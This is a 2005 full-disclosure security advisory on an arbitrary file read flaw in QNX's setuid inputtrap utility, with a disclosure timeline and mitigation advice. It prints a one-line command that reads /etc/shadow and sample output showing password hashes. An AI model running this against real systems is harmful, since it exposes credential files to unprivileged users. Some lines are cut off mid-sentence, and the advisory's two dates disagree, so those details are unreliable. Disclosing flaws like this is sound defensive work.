Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email email@example.com
[Full-disclosure] [RLSA_01-2005] QNX inputtrap arbitrary file read vulnerability
From: Julio Cesar Fort (juliorfdslabs.com.br)
Date: Wed Aug 24 2005 - 09:36:38 CDT
*** rfdslabs security advisory ***
Title: QNX inputtrap arbitrary file read vulnerability [RLSA_01-2005]
Versions: QNX RTOS 6.3, 6.1.0 (possibly others)
Date: Feb 22 2004
Author: Julio Cesar Fort <julio *NO_SPAM* rfdslabs com br>
inputtrap is a utility designed to detect and start input manager in QNX.
inputtrap has a '-t' flag to specify the trap file to be read. Due to
per permissions checking, we have administrative access to read files
in the disk in addition with 'start' flag.
The following simple command will show us /etc/shadow:
$ inputtrap -t /etc/shadow start
options: Unable to lookup root:21QjUKxP9gEJK:0:0:0 in modules table
options: Unable to lookup sandimas:91UzHxvt3x1n2:0:0:0 in modules table
PS: This "design error" problem is similar to an old Debian 1.1 DOSEmu
bility, back in 1999. And it was, surely, erradicated in crucial
of most operating systems.
No official solution yet. We suggest remove inputtrap suid bit or
permissions to a trusted group of users until QNX doesn't release an
22 Feb 2005: Vulnerability detected (in a very very boring day, ill at
09 Jun 2005: Advisory sent to QNX;
10 Jun 2005: QNX contacted rfdslabs;
24 Aug 2005: Advisory sent to security mailing lists.
Thanks to Lucien Rocha, Carlos Barros (barrossecurity.com), George Fleury,
Rodrigo Costa (NERV), Despise, gotfault.org and everyone at rfdslabs.
www.rfdslabs.com.br - computers, sex, human mind, music and more
Recife, PE, Brazil
Full-Disclosure - We believe in it.
Hosted and sponsored by Secunia - http://secunia.com/